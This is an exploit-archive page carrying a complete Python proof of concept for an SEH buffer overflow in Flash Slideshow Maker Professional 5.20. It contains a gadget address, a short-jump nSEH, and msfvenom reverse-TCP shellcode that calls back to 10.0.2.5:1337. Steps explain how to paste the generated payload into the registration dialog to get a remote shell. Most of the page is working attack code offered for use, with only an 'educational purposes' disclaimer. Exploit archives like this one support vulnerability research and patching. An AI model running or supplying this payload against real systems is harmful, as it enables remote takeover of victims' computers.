Flash slideshow maker professional 5.20 buffer overflow (seh) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-09-10 | Type : local | Platform : windows_x86
This exploit / vulnerability Flash slideshow maker professional 5.20 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://flash.dvd-photo-slideshow.com/
# Tested Version: 5.20
# Tested on OS: Windows XP Service Pack 3 x86

# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Name" + "Code" > Click "Ok"
# You will see a sweet reverse shell poped up in your attacker box.

buffer = "A" * 1328
# 0x1011063f : pop eax # pop esi # ret | ascii {PAGE_EXECUTE_READ}
# [cximage.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.9.c
# (C:\Program Files\Flash Slideshow Maker Professional\cximage.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3f\x06\x11\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"

pad ="C" * (2300 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"